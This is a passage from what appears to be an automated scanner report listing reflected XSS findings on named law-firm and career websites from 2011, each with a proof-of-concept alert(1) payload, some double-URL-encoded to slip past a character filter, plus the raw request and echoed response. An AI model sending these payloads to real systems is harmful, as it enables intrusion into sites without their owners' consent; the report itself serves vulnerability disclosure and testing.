true ,containerID: 'loginDiv' ,redirectURL: 'http://' + window.location.hostname + '/wps/portal/usa/membership?mode=31&lastPage=/wps/portal/usa/rankings/individual?rankingId1=2&rankingId2=-1&rankings=19e5bc'-alert(1)-'f398cddff33&regionId=0/x22'
};

var conf =
{
APIKey: 'null' ,enabledProviders: 'facebook,twitter,yahoo,linkedin'
};

var conf2 =
{
APIKey: 'null' ,enabledProviders: 'facebook,twitter,yahoo,linkedin,go
...[SNIP]...

4.123. http://www.vault.com/wps/portal/usa/rankings/individual [regionId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vault.com
Path:   /wps/portal/usa/rankings/individual

Issue detail

The value of the regionId request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 631b6'-alert(1)-'bf48ddfbfb1 was submitted in the regionId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /wps/portal/usa/rankings/individual?rankingId1=2&rankingId2=-1&rankings=1&regionId=0/x22631b6'-alert(1)-'bf48ddfbfb1 HTTP/1.1
Host: www.vault.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:10:52 GMT
Server: IBM_HTTP_Server
IBM-Web2-Location: /wps/portal/usa/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3gzQ0u_YHMPIwP3YBNjA09fQ2M34wBvI6MAA6B8JJK8f6Cxi4GnQbCfr7GZqY-xjyEB3eEg-_DrB8kb4ACOBvp-Hvm5qfoFuREGWSaOigADgNEb/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Vary: User-Agent,Cookie,Accept-Encoding
Set-Cookie: JSESSIONID=00003TfEqWCiulBu_nDIESAN2zl:140i3s34m; Path=/
Keep-Alive: timeout=10, max=89
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Language: en
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6e45525d5f4f58455e445a4a423660;expires=Wed, 19-Jan-2011 15:12:56 GMT;path=/
Content-Length: 112742


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Dat
...[SNIP]...
ID: 'loginDiv' ,redirectURL: 'http://' + window.location.hostname + '/wps/portal/usa/membership?mode=31&lastPage=/wps/portal/usa/rankings/individual?rankingId1=2&rankingId2=-1&rankings=1&regionId=0/x22631b6'-alert(1)-'bf48ddfbfb1'
};

var conf =
{
APIKey: 'null' ,enabledProviders: 'facebook,twitter,yahoo,linkedin'
};

var conf2 =
{
APIKey: 'null' ,enabledProviders: 'facebook,twitter,yahoo,linkedin,google,messenger'
...[SNIP]...

4.124. http://www.vault.com/wps/portal/usa/rankings/individual [regionId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vault.com
Path:   /wps/portal/usa/rankings/individual

Issue detail

The value of the regionId request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86be1"><script>alert(1)</script>fd63fd4328b was submitted in the regionId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wps/portal/usa/rankings/individual?rankingId1=2&rankingId2=-1&rankings=1&regionId=0/x2286be1"><script>alert(1)</script>fd63fd4328b HTTP/1.1
Host: www.vault.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:10:48 GMT
Server: IBM_HTTP_Server
IBM-Web2-Location: /wps/portal/usa/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3gzQ0u_YHMPIwP3YBNjA09fQ2M34wBvI6MAA6B8JJK8f6Cxi4GnQbCfr7GZqY-xjyEB3eEg-_DrB8kb4ACOBvp-Hvm5qfoFuREGWSaOigADgNEb/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Vary: User-Agent,Cookie,Accept-Encoding
Set-Cookie: JSESSIONID=0000X9qEA0qCib-qziLPO4C_5_v:140i3s34m; Path=/
Keep-Alive: timeout=10, max=73
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Language: en
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6e45525d5f4f58455e445a4a423660;expires=Wed, 19-Jan-2011 15:12:53 GMT;path=/
Content-Length: 112905


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Dat
...[SNIP]...
<a href="http://www.addthis.com/bookmark.php" addthis:url="http://www.vault.com/wps/portal/usa/rankings/individual?rankingId1=2&rankingId2=-1&rankings=1&regionId=0/x2286be1"><script>alert(1)</script>fd63fd4328b" addthis:title="http://www.vault.com/wps/portal/usa/rankings/individual" class="addthis_button_email" onClick="_gaq.push(['_trackEvent', 'vault.com tools', 'Email', 'http://www.vault.com/wps/portal/us
...[SNIP]...

4.125. http://www.weil.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.weil.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ef2ab</script><script>alert(1)</script>803ebce93f8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?ef2ab</script><script>alert(1)</script>803ebce93f8=1 HTTP/1.1
Host: www.weil.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:10:53 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 001148
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A02
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1087; path=/
Set-Cookie: PortletId=1701; path=/
Set-Cookie: SiteId=1086; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=h3zixcnxcv5l1a45xxonrz45; path=/; HttpOnly
Set-Cookie: CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1085&RootPortletID=665&RootPortletH4AssetID=1301&LicenseKey= &Name=Web Framework&URL=wc; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 19529
Set-Cookie: NSC_MC_XfjmQpe_B0102=ffffffff09d5f61c45525d5f4f58455e445a4a423660;path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head>
<title id="ctl00_htmlTitle">Weil, Gotshal &amp; Man
...[SNIP]...
<!--
window["ctl00_ctl04_cmbSearch"] = new RadComboBox("cmbSearch","ctl00_ctl04_cmbSearch");window["ctl00_ctl04_cmbSearch"].Initialize({"LoadOnDemandUrl":"/sitesearchstream.aspx?ef2ab</script><script>alert(1)</script>803ebce93f8=1&rcbID=ctl00_ctl04_cmbSearch&rcbServerID=cmbSearch","OnClientSelectedIndexChanged":"SelectedIndexChanged","OnClientDropDownOpening":"HandleOpen","OnClientFocus":"GotFocus","OnClientBlur":"GotBlur","O
...[SNIP]...

4.126. http://www.weil.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.weil.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cd131'-alert(1)-'83a7499dccf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?cd131'-alert(1)-'83a7499dccf=1 HTTP/1.1
Host: www.weil.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:10:55 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 001148
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A02
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1087; path=/
Set-Cookie: PortletId=1701; path=/
Set-Cookie: SiteId=1086; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=2rtk5eyh144bhwn4mxrat4ro; path=/; HttpOnly
Set-Cookie: CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1085&RootPortletID=665&RootPortletH4AssetID=1301&LicenseKey= &Name=Web Framework&URL=wc; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 19431
Set-Cookie: NSC_MC_XfjmQpe_B0102=ffffffff09d5f61c45525d5f4f58455e445a4a423660;path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head>
<title id="ctl00_htmlTitle">Weil, Gotshal &amp; Man
...[SNIP]...
<![CDATA[
var myForm=document.forms['aspnetForm'];if(!myForm){myForm=document.aspnetForm;}myForm.action='/'+''+'Home.aspx?cd131'-alert(1)-'83a7499dccf=1';//]]>
...[SNIP]...

4.127. http://www.wileyrein.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 85981"><script>alert(1)</script>038dfd0999c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?85981"><script>alert(1)</script>038dfd0999c=1 HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:10:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=18263798;expires=Fri, 11-Jan-2041 15:10:49 GMT;path=/
Set-Cookie: CFTOKEN=29109429;expires=Fri, 11-Jan-2041 15:10:49 GMT;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="85981"><script>alert(1)</script>038dfd0999c" value="1">
...[SNIP]...

4.128. http://www.wileyrein.com/css/_blog.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/_blog.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 490d8%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea3a95841ba2 was submitted in the REST URL parameter 1. This input was echoed as 490d8"><script>alert(1)</script>a3a95841ba2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css490d8%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea3a95841ba2/_blog.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:13:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css490d8"><script>alert(1)</script>a3a95841ba2/_blog.css" value="">
...[SNIP]...

4.129. http://www.wileyrein.com/css/_blog.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/_blog.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1c8c9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e84fbe621327 was submitted in the REST URL parameter 2. This input was echoed as 1c8c9"><script>alert(1)</script>84fbe621327 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css/_blog.css1c8c9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e84fbe621327 HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:13:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css/_blog.css1c8c9"><script>alert(1)</script>84fbe621327" value="">
...[SNIP]...

4.130. http://www.wileyrein.com/css/_list.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/_list.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86d6e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea6da1f2345d was submitted in the REST URL parameter 1. This input was echoed as 86d6e"><script>alert(1)</script>a6da1f2345d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css86d6e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea6da1f2345d/_list.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:13:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css86d6e"><script>alert(1)</script>a6da1f2345d/_list.css" value="">
...[SNIP]...

4.131. http://www.wileyrein.com/css/_list.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/_list.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d81ed%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eda2c05f8831 was submitted in the REST URL parameter 2. This input was echoed as d81ed"><script>alert(1)</script>da2c05f8831 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css/_list.cssd81ed%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eda2c05f8831 HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:13:24 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css/_list.cssd81ed"><script>alert(1)</script>da2c05f8831" value="">
...[SNIP]...

4.132. http://www.wileyrein.com/css/_main.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/_main.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bdd5f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e672638c3b was submitted in the REST URL parameter 1. This input was echoed as bdd5f"><script>alert(1)</script>672638c3b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /cssbdd5f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e672638c3b/_main.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/cssbdd5f"><script>alert(1)</script>672638c3b/_main.css" value="">
...[SNIP]...

4.133. http://www.wileyrein.com/css/_main.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/_main.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f1b51%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e450c96039aa was submitted in the REST URL parameter 2. This input was echoed as f1b51"><script>alert(1)</script>450c96039aa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css/_main.cssf1b51%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e450c96039aa HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css/_main.cssf1b51"><script>alert(1)</script>450c96039aa" value="">
...[SNIP]...

4.134. http://www.wileyrein.com/css/_navMenu.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/_navMenu.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de5e6%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e848b9694317 was submitted in the REST URL parameter 1. This input was echoed as de5e6"><script>alert(1)</script>848b9694317 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /cssde5e6%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e848b9694317/_navMenu.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:13:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/cssde5e6"><script>alert(1)</script>848b9694317/_navMenu.css" value="">
...[SNIP]...

4.135. http://www.wileyrein.com/css/_navMenu.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/_navMenu.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 95db9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eaee734d6695 was submitted in the REST URL parameter 2. This input was echoed as 95db9"><script>alert(1)</script>aee734d6695 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css/_navMenu.css95db9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eaee734d6695 HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:13:24 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css/_navMenu.css95db9"><script>alert(1)</script>aee734d6695" value="">
...[SNIP]...

4.136. http://www.wileyrein.com/css/_navSearch.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
